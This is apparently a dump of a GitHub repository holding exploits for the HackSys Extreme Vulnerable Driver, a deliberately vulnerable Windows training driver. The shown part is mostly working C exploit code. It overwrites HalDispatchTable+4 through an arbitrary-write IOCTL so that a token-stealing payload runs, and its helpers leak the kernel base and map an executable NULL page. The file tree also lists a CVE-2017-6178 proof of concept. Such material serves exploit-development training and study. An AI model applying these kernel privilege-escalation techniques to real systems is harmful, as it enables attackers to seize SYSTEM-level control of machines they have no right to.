├── .gitattributes
├── .gitignore
├── HEVD_Source_with_Unin_Heap_Variable_Chall
├── ArbitraryOverwrite.c
├── ArbitraryOverwrite.h
├── Common.c
├── Common.h
├── Debug
│ ├── ArbitraryOverwrite.obj
│ ├── CL.read.1.tlog
│ ├── CL.write.1.tlog
│ ├── Common.obj
│ ├── HackSysEVDExploit.exe
│ ├── HackSysEVDExploit.exe.intermediate.manifest
│ ├── HackSysEVDExploit.ilk
│ ├── HackSysEVDExploit.lastbuildstate
│ ├── HackSysEVDExploit.log
│ ├── HackSysEVDExploit.obj
│ ├── HackSysEVDExploit.pdb
│ ├── HackSysEVDExploit.vcxprojResolveAssemblyReference.cache
│ ├── HackSysEVDExploit.write.1.tlog
│ ├── IntegerOverflow.obj
│ ├── NullPointerDereference.obj
│ ├── Payloads.obj
│ ├── PoolOverflow.obj
│ ├── StackOverflow.obj
│ ├── StackOverflowGS.obj
│ ├── TypeConfusion.obj
│ ├── UninitializedHeapVariable.obj
│ ├── UninitializedStackVariable.obj
│ ├── UseAfterFree.obj
│ ├── cl.command.1.tlog
│ ├── link.command.1.tlog
│ ├── link.read.1.tlog
│ ├── link.write.1.tlog
│ ├── mt.command.1.tlog
│ ├── mt.read.1.tlog
│ ├── mt.write.1.tlog
│ ├── vc100.idb
│ └── vc100.pdb
├── HackSysEVDExploit.c
├── HackSysEVDExploit.h
├── HackSysEVDExploit.sdf
├── HackSysEVDExploit.sln
├── HackSysEVDExploit.suo
├── HackSysEVDExploit.vcxproj
├── HackSysEVDExploit.vcxproj.filters
├── HackSysEVDExploit.vcxproj.user
├── IntegerOverflow.c
├── IntegerOverflow.h
├── NullPointerDereference.c
├── NullPointerDereference.h
├── Payloads.c
├── Payloads.h
├── PoolOverflow.c
├── PoolOverflow.h
├── Release
│ ├── ArbitraryOverwrite.obj
│ ├── CL.read.1.tlog
│ ├── CL.write.1.tlog
│ ├── Common.obj
│ ├── HackSysEVDExploit.Build.CppClean.log
│ ├── HackSysEVDExploit.exe
│ ├── HackSysEVDExploit.exe.intermediate.manifest
│ ├── HackSysEVDExploit.lastbuildstate
│ ├── HackSysEVDExploit.log
│ ├── HackSysEVDExploit.obj
│ ├── HackSysEVDExploit.pdb
│ ├── HackSysEVDExploit.vcxprojResolveAssemblyReference.cache
│ ├── HackSysEVDExploit.write.1.tlog
│ ├── HackSysEVDExploit1.exe
│ ├── IntegerOverflow.obj
│ ├── NullPointerDereference.obj
│ ├── Payloads.obj
│ ├── PoolOverflow.obj
│ ├── StackOverflow.obj
│ ├── StackOverflowGS.obj
│ ├── TypeConfusion.obj
│ ├── UninitializedHeapVariable.obj
│ ├── UninitializedStackVariable.obj
│ ├── UseAfterFree.obj
│ ├── cl.command.1.tlog
│ ├── link.command.1.tlog
│ ├── link.read.1.tlog
│ ├── link.write.1.tlog
│ ├── mt.command.1.tlog
│ ├── mt.read.1.tlog
│ ├── mt.write.1.tlog
│ └── vc100.pdb
├── StackOverflow.c
├── StackOverflow.h
├── StackOverflowGS.c
├── StackOverflowGS.h
├── TypeConfusion.c
├── TypeConfusion.h
├── UninitializedHeapVariable.c
├── UninitializedHeapVariable.c.bak
├── UninitializedHeapVariable.h
├── UninitializedStackVariable.c
├── UninitializedStackVariable.h
├── UseAfterFree.c
├── UseAfterFree.h
├── arg.h
└── ipch
│ └── hacksysevdexploit-6f66b5a3
│ └── hacksysevdexploit-e885ecc0.ipch
├── HEVD_Win10&Win8
├── README.txt
└── Stop_by_win8
│ ├── Stop_by_win10.sln
│ ├── Stop_by_win10.suo
│ └── Stop_by_win10
│ ├── HEVD_Stop_By_Win10.c
│ ├── HEVD_Stop_By_Win10.h
│ ├── Release
│ ├── CL.read.1.tlog
│ ├── CL.write.1.tlog
│ ├── HEVD_Stop_By_Win10.obj
│ ├── Stop_by_win10.Build.CppClean.log
│ ├── Stop_by_win10.lastbuildstate
│ ├── Stop_by_win10.log
│ ├── Stop_by_win10.unsuccessfulbuild
│ ├── Stop_by_win10.write.1.tlog
│ ├── cl.command.1.tlog
│ ├── link.command.1.tlog
│ ├── link.read.1.tlog
│ ├── link.write.1.tlog
│ └── vc100.pdb
│ ├── Stop_By_Win10.cpp
│ ├── Stop_by_win10.vcxproj
│ ├── Stop_by_win10.vcxproj.filters
│ ├── Stop_by_win10.vcxproj.user
│ ├── _debugbreak.asm
│ ├── _debugbreak.obj
│ └── x64
│ └── Release
│ ├── CL.read.1.tlog
│ ├── CL.write.1.tlog
│ ├── HEVD_Stop_By_Win10.obj
│ ├── Stop_by_win10.Build.CppClean.log
│ ├── Stop_by_win10.exe.intermediate.manifest
│ ├── Stop_by_win10.lastbuildstate
│ ├── Stop_by_win10.log
│ ├── Stop_by_win10.write.1.tlog
│ ├── cl.command.1.tlog
│ ├── custombuild.command.1.tlog
│ ├── custombuild.read.1.tlog
│ ├── custombuild.write.1.tlog
│ ├── link.command.1.tlog
│ ├── link.read.1.tlog
│ ├── link.write.1.tlog
│ ├── mt.command.1.tlog
│ ├── mt.read.1.tlog
│ ├── mt.write.1.tlog
│ └── vc100.pdb
├── _cve_2017_6178_poc
└── _CVE_2017_6178_PoC.cpp
└── memory-leak_output_art_ReadOnePNGImage_output.picon
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
4 | # Custom for Visual Studio
5 | *.cs diff=csharp
6 |
7 | # Standard to msysgit
8 | *.doc diff=astextplain
9 | *.DOC diff=astextplain
10 | *.docx diff=astextplain
11 | *.DOCX diff=astextplain
12 | *.dot diff=astextplain
13 | *.DOT diff=astextplain
14 | *.pdf diff=astextplain
15 | *.PDF diff=astextplain
16 | *.rtf diff=astextplain
17 | *.RTF diff=astextplain
18 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Windows image file caches
2 | Thumbs.db
3 | ehthumbs.db
4 |
5 | # Folder config file
6 | Desktop.ini
7 |
8 | # Recycle Bin used on file shares
9 | $RECYCLE.BIN/
10 |
11 | # Windows Installer files
12 | *.cab
13 | *.msi
14 | *.msm
15 | *.msp
16 |
17 | # Windows shortcuts
18 | *.lnk
19 |
20 | # =========================
21 | # Operating System Files
22 | # =========================
23 |
24 | # OSX
25 | # =========================
26 |
27 | .DS_Store
28 | .AppleDouble
29 | .LSOverride
30 |
31 | # Thumbnails
32 | ._*
33 |
34 | # Files that might appear in the root of a volume
35 | .DocumentRevisions-V100
36 | .fseventsd
37 | .Spotlight-V100
38 | .TemporaryItems
39 | .Trashes
40 | .VolumeIcon.icns
41 |
42 | # Directories potentially created on remote AFP share
43 | .AppleDB
44 | .AppleDesktop
45 | Network Trash Folder
46 | Temporary Items
47 | .apdisk
48 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/ArbitraryOverwrite.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | ArbitraryOverwrite.c
43 |
44 | Abstract:
45 | This module implements the exploit for Arbitrary Memory
46 | Overwrite Vulnerability implemented in HackSys Extreme
47 | Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #include "ArbitraryOverwrite.h"
52 |
53 | DWORD WINAPI ArbitraryOverwriteThread(LPVOID Parameter) {
54 | ULONG Interval = 0;
55 | ULONG BytesReturned;
56 | HANDLE hFile = NULL;
57 | HMODULE hNtDll = NULL;
58 | PVOID HalDispatchTable = NULL;
59 | PVOID HalDispatchTablePlus4 = NULL;
60 | LPCSTR FileName = (LPCSTR)DEVICE_NAME;
61 | PWRITE_WHAT_WHERE WriteWhatWhere = NULL;
62 | PVOID EopPayload = &TokenStealingPayloadWin7Generic;
63 |
64 | __try {
65 | DEBUG_MESSAGE("\t[+] Setting Thread Priority\n");
66 |
67 | if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST)) {
68 | DEBUG_ERROR("\t\t[-] Failed To Set As THREAD_PRIORITY_HIGHEST\n");
69 | }
70 | else {
71 | DEBUG_INFO("\t\t[+] Priority Set To THREAD_PRIORITY_HIGHEST\n");
72 | }
73 |
74 | // Get the device handle
75 | DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
76 | DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);
77 |
78 | hFile = GetDeviceHandle(FileName);
79 |
80 | if (hFile == INVALID_HANDLE_VALUE) {
81 | DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
82 | exit(EXIT_FAILURE);
83 | }
84 | else {
85 | DEBUG_INFO("\t\t[+] Device Handle: 0x%X\n", hFile);
86 | }
87 |
88 | DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");
89 |
90 | DEBUG_INFO("\t\t[+] Allocating Memory For WRITE_WHAT_WHERE Structure\n");
91 |
92 | // Allocate the Heap chunk
93 | WriteWhatWhere = (PWRITE_WHAT_WHERE)HeapAlloc(GetProcessHeap(),
94 | HEAP_ZERO_MEMORY,
95 | sizeof(WRITE_WHAT_WHERE));
96 |
97 | if (!WriteWhatWhere) {
98 | DEBUG_ERROR("\t\t[-] Failed To Allocate Memory: 0x%X\n", GetLastError());
99 | exit(EXIT_FAILURE);
100 | }
101 | else {
102 | DEBUG_INFO("\t\t\t[+] Memory Allocated: 0x%p\n", WriteWhatWhere);
103 | DEBUG_INFO("\t\t\t[+] Allocation Size: 0x%X\n", sizeof(WRITE_WHAT_WHERE));
104 | }
105 |
106 | DEBUG_INFO("\t\t[+] Gathering Information About Kernel\n");
107 |
108 | HalDispatchTable = GetHalDispatchTable();
109 |
110 | if (!HalDispatchTable) {
111 | DEBUG_ERROR("\t\t[-] Failed Gathering Information: 0x%X\n", GetLastError());
112 | exit(EXIT_FAILURE);
113 | }
114 | else {
115 | HalDispatchTablePlus4 = (PVOID)((ULONG)HalDispatchTable + sizeof(PVOID));
116 |
117 | DEBUG_INFO("\t\t\t[+] HalDispatchTable+0x4: 0x%p\n", HalDispatchTablePlus4);
118 | }
119 |
120 | DEBUG_INFO("\t\t[+] Preparing WRITE_WHAT_WHERE structure\n");
121 |
122 | WriteWhatWhere->What = (PULONG)&EopPayload;
123 | WriteWhatWhere->Where = (PULONG)HalDispatchTablePlus4;
124 |
125 | DEBUG_INFO("\t\t\t[+] WriteWhatWhere: 0x%p\n", WriteWhatWhere);
126 | DEBUG_INFO("\t\t\t[+] WriteWhatWhere->What: 0x%p\n", WriteWhatWhere->What);
127 | DEBUG_INFO("\t\t\t[+] WriteWhatWhere->Where: 0x%p\n", WriteWhatWhere->Where);
128 |
129 | DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);
130 |
131 | DEBUG_MESSAGE("\t[+] Triggering Arbitrary Memory Overwrite\n");
132 |
133 | OutputDebugString("****************Kernel Mode****************\n");
134 |
135 | DeviceIoControl(hFile,
136 | HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE,
137 | (LPVOID)WriteWhatWhere,
138 | sizeof(WRITE_WHAT_WHERE),
139 | NULL,
140 | 0,
141 | &BytesReturned,
142 | NULL);
143 |
144 | OutputDebugString("****************Kernel Mode****************\n");
145 |
146 | DEBUG_INFO("\t\t[+] Triggering Payload\n");
147 |
148 | hNtDll = LoadLibrary("ntdll.dll");
149 |
150 | if (!hNtDll) {
151 | DEBUG_ERROR("\t\t[-] Failed loading NtDll: 0x%X\n", GetLastError());
152 | exit(EXIT_FAILURE);
153 | }
154 |
155 | NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, "NtQueryIntervalProfile");
156 |
157 | if (!NtQueryIntervalProfile) {
158 | DEBUG_ERROR("\t\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\n", GetLastError());
159 | exit(EXIT_FAILURE);
160 | }
161 |
162 | NtQueryIntervalProfile(0x1337, &Interval);
163 |
164 | HeapFree(GetProcessHeap(), 0, (LPVOID)WriteWhatWhere);
165 |
166 | WriteWhatWhere = NULL;
167 | }
168 | __except (EXCEPTION_EXECUTE_HANDLER) {
169 | DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetLastError());
170 | exit(EXIT_FAILURE);
171 | }
172 |
173 | return EXIT_SUCCESS;
174 | }
175 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/ArbitraryOverwrite.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | ArbitraryOverwrite.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | exploit for Arbitrary Memory Overwrite Vulnerability
47 | implemented in HackSys Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #ifndef __ARBITRARY_OVERWRITE_H__
52 | #define __ARBITRARY_OVERWRITE_H__
53 |
54 | #pragma once
55 |
56 | #include "Common.h"
57 |
58 | typedef struct _WRITE_WHAT_WHERE {
59 | PULONG What;
60 | PULONG Where;
61 | } WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;
62 |
63 | DWORD WINAPI ArbitraryOverwriteThread(LPVOID Parameter);
64 |
65 | #endif //__ARBITRARY_OVERWRITE_H__
66 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Common.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | Common.c
43 |
44 | Abstract:
45 | This module implements the methods which are
46 | common to all the exploit modules.
47 |
48 | --*/
49 |
50 | #include "Common.h"
51 |
52 | VOID ClearScreen()
53 | {
54 | //
55 | // https://msdn.microsoft.com/en-us/library/windows/desktop/ms682022(v=vs.85).aspx
56 | //
57 |
58 | DWORD ConSize;
59 | HANDLE hConsole;
60 | DWORD CharsWritten;
61 | COORD CoordScreen = {0, 0};
62 | CONSOLE_SCREEN_BUFFER_INFO ConsoleScreenBufferInfo;
63 |
64 | hConsole = GetStdHandle(STD_OUTPUT_HANDLE);
65 |
66 | if (!GetConsoleScreenBufferInfo(hConsole, &ConsoleScreenBufferInfo)) {
67 | return;
68 | }
69 |
70 | ConSize = ConsoleScreenBufferInfo.dwSize.X * ConsoleScreenBufferInfo.dwSize.Y;
71 |
72 | if (!FillConsoleOutputCharacter(hConsole,
73 | (TCHAR)' ',
74 | ConSize,
75 | CoordScreen,
76 | &CharsWritten )) {
77 | return;
78 | }
79 |
80 | if (!GetConsoleScreenBufferInfo(hConsole, &ConsoleScreenBufferInfo)) {
81 | return;
82 | }
83 |
84 | if (!FillConsoleOutputAttribute(hConsole,
85 | ConsoleScreenBufferInfo.wAttributes,
86 | ConSize,
87 | CoordScreen,
88 | &CharsWritten)) {
89 | return;
90 | }
91 |
92 | SetConsoleCursorPosition(hConsole, CoordScreen);
93 | }
94 |
95 |
96 | VOID ColoredConsoleOuput(WORD wColor, CONST PTCHAR fmt, ...) {
97 | SIZE_T Length = 0;
98 | PTCHAR DebugString;
99 | va_list args = NULL;
100 | HANDLE hConsoleOutput;
101 | WORD CurrentAttributes;
102 | CONSOLE_SCREEN_BUFFER_INFO ConsoleScreenBufferInfo;
103 |
104 | va_start(args, fmt);
105 | Length = _vscprintf(fmt, args) + 2;
106 | DebugString = (PTCHAR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, Length * sizeof(TCHAR));
107 | hConsoleOutput = GetStdHandle(STD_OUTPUT_HANDLE);
108 | GetConsoleScreenBufferInfo(hConsoleOutput, &ConsoleScreenBufferInfo);
109 | CurrentAttributes = ConsoleScreenBufferInfo.wAttributes;
110 | SetConsoleTextAttribute(hConsoleOutput, FOREGROUND_INTENSITY | wColor);
111 |
112 | vfprintf(stderr, fmt, args);
113 | vsprintf_s(DebugString, Length, fmt, args);
114 | OutputDebugString(DebugString);
115 |
116 | SetConsoleTextAttribute(hConsoleOutput, CurrentAttributes);
117 | va_end(args);
118 | HeapFree(GetProcessHeap(), 0, (LPVOID)DebugString);
119 | }
120 |
121 | VOID CenterConsoleScreen() {
122 | HWND hConsoleWindow = GetConsoleWindow();
123 | int xPos = (GetSystemMetrics(SM_CXSCREEN) - 680) / 2;
124 | int yPos = ((GetSystemMetrics(SM_CYSCREEN) - 350) / 2) - 150;
125 | MoveWindow(hConsoleWindow, xPos, yPos, 700, 600, TRUE);
126 | }
127 |
128 | HANDLE GetDeviceHandle(LPCSTR FileName) {
129 | HANDLE hFile = NULL;
130 |
131 | hFile = CreateFile(FileName,
132 | GENERIC_READ | GENERIC_WRITE,
133 | FILE_SHARE_READ | FILE_SHARE_WRITE,
134 | NULL,
135 | OPEN_EXISTING,
136 | FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,
137 | NULL);
138 |
139 | return hFile;
140 | }
141 |
142 | DWORD GetProcessID(LPCSTR ProcessName) {
143 | ULONG ProcessID = 0;
144 | HANDLE hProcessSnapshot = NULL;
145 | PROCESSENTRY32 ProcessEntry32 = {0};
146 | ProcessEntry32.dwSize = sizeof(PROCESSENTRY32);
147 |
148 | // Create the snapshot of all processes
149 | hProcessSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
150 |
151 | if (!hProcessSnapshot) {
152 | DEBUG_ERROR("\t\t[-] Failed Creating Snapshot Of Processes: 0x%X\n", GetLastError());
153 | exit(EXIT_FAILURE);
154 | }
155 |
156 | if (!Process32First(hProcessSnapshot, &ProcessEntry32)) {
157 | DEBUG_ERROR("\t\t[-] Failed To Get Info About First Process: 0x%X\n", GetLastError());
158 | exit(EXIT_FAILURE);
159 | }
160 |
161 | do {
162 | if (strcmp(ProcessName, ProcessEntry32.szExeFile) == 0) {
163 | ProcessID = ProcessEntry32.th32ProcessID;
164 | break;
165 | }
166 | } while (Process32Next(hProcessSnapshot, &ProcessEntry32));
167 |
168 | CloseHandle(hProcessSnapshot);
169 |
170 | return ProcessID;
171 | }
172 |
173 | PVOID GetHalDispatchTable() {
174 | PCHAR KernelImage;
175 | SIZE_T ReturnLength;
176 | HMODULE hNtDll = NULL;
177 | PVOID HalDispatchTable = NULL;
178 | HMODULE hKernelInUserMode = NULL;
179 | PVOID KernelBaseAddressInKernelMode;
180 | NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;
181 | PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;
182 |
183 | hNtDll = LoadLibrary("ntdll.dll");
184 |
185 | if (!hNtDll) {
186 | DEBUG_ERROR("\t\t\t[-] Failed To Load NtDll.dll: 0x%X\n", GetLastError());
187 | exit(EXIT_FAILURE);
188 | }
189 |
190 | NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, "NtQuerySystemInformation");
191 |
192 | if (!NtQuerySystemInformation) {
193 | DEBUG_ERROR("\t\t\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\n", GetLastError());
194 | exit(EXIT_FAILURE);
195 | }
196 |
197 | NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);
198 |
199 | // Allocate the Heap chunk
200 | pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),
201 | HEAP_ZERO_MEMORY,
202 | ReturnLength);
203 |
204 | if (!pSystemModuleInformation) {
205 | DEBUG_ERROR("\t\t\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\n", GetLastError());
206 | exit(EXIT_FAILURE);
207 | }
208 | NtStatus = NtQuerySystemInformation(SystemModuleInformation,
209 | pSystemModuleInformation,
210 | ReturnLength,
211 | &ReturnLength);
212 |
213 | if (NtStatus != STATUS_SUCCESS) {
214 | DEBUG_ERROR("\t\t\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\n", GetLastError());
215 | exit(EXIT_FAILURE);
216 | }
217 |
218 | KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;
219 | KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\') + 1;
220 |
221 | DEBUG_INFO("\t\t\t[+] Loaded Kernel: %s\n", KernelImage);
222 | DEBUG_INFO("\t\t\t[+] Kernel Base Address: 0x%p\n", KernelBaseAddressInKernelMode);
223 |
224 | hKernelInUserMode = LoadLibraryA(KernelImage);
225 |
226 | if (!hKernelInUserMode) {
227 | DEBUG_ERROR("\t\t\t[-] Failed To Load Kernel: 0x%X\n", GetLastError());
228 | exit(EXIT_FAILURE);
229 | }
230 |
231 | // This is still in user mode
232 | HalDispatchTable = (PVOID)GetProcAddress(hKernelInUserMode, "HalDispatchTable");
233 |
234 | if (!HalDispatchTable) {
235 | DEBUG_ERROR("\t\t\t[-] Failed Resolving HalDispatchTable: 0x%X\n", GetLastError());
236 | exit(EXIT_FAILURE);
237 | }
238 | else {
239 | HalDispatchTable = (PVOID)((ULONG)HalDispatchTable - (ULONG)hKernelInUserMode);
240 |
241 | // Here we get the address of HapDispatchTable in Kernel mode
242 | HalDispatchTable = (PVOID)((ULONG)HalDispatchTable + (ULONG)KernelBaseAddressInKernelMode);
243 |
244 | DEBUG_INFO("\t\t\t[+] HalDispatchTable: 0x%p\n", HalDispatchTable);
245 | }
246 |
247 | HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);
248 |
249 | if (hNtDll) {
250 | FreeLibrary(hNtDll);
251 | }
252 |
253 | if (hKernelInUserMode) {
254 | FreeLibrary(hKernelInUserMode);
255 | }
256 |
257 | hNtDll = NULL;
258 | hKernelInUserMode = NULL;
259 | pSystemModuleInformation = NULL;
260 |
261 | return HalDispatchTable;
262 | }
263 |
264 | BOOL MapNullPage() {
265 | HMODULE hNtdll;
266 | SIZE_T RegionSize = 0x1000; // will be rounded up to the next host
267 | // page size address boundary -> 0x2000
268 |
269 | PVOID BaseAddress = (PVOID)0x00000001; // will be rounded down to the next host
270 | // page size address boundary -> 0x00000000
271 | NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;
272 |
273 | hNtdll = GetModuleHandle("ntdll.dll");
274 |
275 | // Grab the address of NtAllocateVirtualMemory
276 | NtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
277 |
278 | if (!NtAllocateVirtualMemory) {
279 | DEBUG_ERROR("\t\t[-] Failed Resolving NtAllocateVirtualMemory: 0x%X\n", GetLastError());
280 | exit(EXIT_FAILURE);
281 | }
282 |
283 | // Allocate the Virtual memory
284 | NtStatus = NtAllocateVirtualMemory((HANDLE)0xFFFFFFFF,
285 | &BaseAddress,
286 | 0,
287 | &RegionSize,
288 | MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
289 | PAGE_EXECUTE_READWRITE);
290 |
291 | if (NtStatus != STATUS_SUCCESS) {
292 | DEBUG_ERROR("\t\t\t\t[-] Virtual Memory Allocation Failed: 0x%x\n", NtStatus);
293 | exit(EXIT_FAILURE);
294 | }
295 | else {
296 | DEBUG_INFO("\t\t\t[+] Memory Allocated: 0x%p\n", BaseAddress);
297 | DEBUG_INFO("\t\t\t[+] Allocation Size: 0x%X\n", RegionSize);
298 | }
299 |
300 | FreeLibrary(hNtdll);
301 |
302 | return TRUE;
303 | }
304 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/ArbitraryOverwrite.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/ArbitraryOverwrite.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Debug/CL.read.1.tlog:
--------------------------------------------------------------------------------
